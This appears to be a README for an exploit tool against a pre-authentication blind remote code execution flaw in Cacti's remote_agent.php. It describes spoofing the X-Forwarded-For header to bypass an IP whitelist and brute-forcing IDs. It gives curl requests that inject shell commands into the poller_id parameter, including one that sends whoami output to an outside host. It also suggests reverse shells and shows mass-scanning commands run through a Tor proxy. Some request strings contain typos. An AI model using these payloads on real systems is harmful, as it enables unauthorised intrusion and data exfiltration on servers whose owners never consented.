Cacti Blind Remote Code Execution (Pre-Auth)
This is for educational purposes only. I am not responsible for your actions. Use at your own discretion.
This script bruteforces variables required to exploit this vulnerability. This exploit requires the following 3 variables:
- Whitelisted IP address
- Correct
host_idparameter - Correct
local_data_idsparameter
The file remote_agent.php is protected by a IP whitelist. You can bypass this by spoofing your IP address in the X-Forwarded-IP header. Most instances will have 127.0.0.1 or the server's own IP address whitelisted.
Next you need to bruteforce the host_id and local_data_ids request parameters. This is done by enumerating pairs of integers x,y from a default min value of 1 and max value of 10.
Example Request
pair_x="1"
pair_y="2"
curl -k -H "X-Forwarded-For: 127.0.0.1" \
"https://target.com/cacti/remote_agent.php?action=polldata&poller_id=1&host_id=$pari_x&=local_data_ids[]=$pair_y"
[]After you've gotten these 3 variables, you can inject a shell command into the poller_id key and escape it by putting a ; before your command.
This is a blind RCE, so you need to send the output of your command somewhere like interact.sh or open a reverse shell. Remember to URL encode your the poller_id value!
The following executes the command ping $(whoami).test.com
curl -k -H "X-Forwarded-For: 127.0.0.01" \
"https://target.com/cacti/remote_agent.php?action=polldata&host_id=1&local_data_ids[]=3&poller_id=;ping%20%24%28whoami%29.test.com"The script oututs in a CSV format. The headers are "target", "ip", "host_id", "data_id", "url".
If the url value is missing, it means the script was able to bypass the IP restriction but not successfully bruteforce the IDs. You can take this output and set a higher max value to attempt again.
You can use the following commands to quickly parse the output file
tail -n +2 results.csv | cut -d ',' -f1 | sort -utail -n +2 results.csv | cut -d ',' -f5 | sort -u go build -v -o bruteforce bruteforce.go./bruteforce -l targets.txt -t 50 -min 1 -max 10- Targets must be a list of IP addresses, port may be omitted
- Socks5 proxy is supported
-proxy socks5://127.0.0.1:9050 - Default output file is
results.csv